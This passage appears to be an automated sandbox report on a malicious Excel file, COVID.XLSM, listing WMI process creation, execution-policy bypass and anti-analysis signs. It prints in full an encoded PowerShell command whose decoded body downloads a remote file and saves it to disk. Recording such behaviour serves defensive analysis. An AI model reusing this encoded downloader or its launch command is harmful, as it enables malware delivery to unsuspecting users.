AZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{4DB9AD88-5219-4A50-B7BA-DED0ECFD4DAD} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal84.expl.evad.winXLSM@6/7@1/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: COVID.XLSMInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: COVID.XLSMInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: COVID.XLSMInitial sample: OLE zip file path = xl/media/image1.png
Source: COVID.XLSMInitial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
Source: COVID.XLSMInitial sample: OLE zip file path = xl/comments1.xml
Source: COVID.XLSMInitial sample: OLE zip file path = xl/comments2.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.729401670.000002E1FB280000.00000004.00000001.sdmp
Source: COVID.XLSMInitial sample: OLE summary subject = Removed Hoo36:HA/HB/HQ and corresponding crosswalk and 2nd modifer codes per CABHA policy and IU82.

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3544Thread sleep count: 4519 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600Thread sleep count: 4552 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4519Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4552Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000006.00000002.729515196.000002E1FB302000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:1.
Source: powershell.exe, 00000006.00000002.729430572.000002E1FB295000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000006.00000002.729584273.000002E1FB480000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policyShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKA